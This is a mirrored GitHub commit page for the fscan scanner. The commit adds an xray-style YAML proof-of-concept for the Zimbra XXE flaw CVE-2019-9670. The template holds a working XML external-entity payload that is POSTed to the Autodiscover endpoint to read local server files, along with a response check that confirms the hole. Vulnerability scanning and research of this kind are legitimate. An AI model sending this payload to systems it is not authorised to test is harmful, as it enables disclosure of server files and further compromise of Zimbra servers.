mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,19 @@
|
||||
name: poc-yaml-zimbra-cve-2019-9670-xxe
|
||||
rules:
|
||||
- method: POST
|
||||
path: /Autodiscover/Autodiscover.xml
|
||||
headers:
|
||||
Content-Type: text/xml
|
||||
body: >-
|
||||
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:./" >]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>[email protected]</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.body.bcontains(b"zmmailboxd.out") && response.body.bcontains(b"Requested response schema not available")
|
||||
detail:
|
||||
author: fnmsd(https://blog.csdn.net/fnmsd)
|
||||
cve-id: CVE-2019-9670
|
||||
vuln_path: /Autodiscover/Autodiscover.xml
|
||||
description: Zimbra XXE Vul,may Control your Server with AdminPort SSRF
|
||||
links:
|
||||
- https://blog.csdn.net/fnmsd/article/details/88657083
|
||||
- https://blog.csdn.net/fnmsd/article/details/89235589
|
||||
Reference in New Issue
Block a user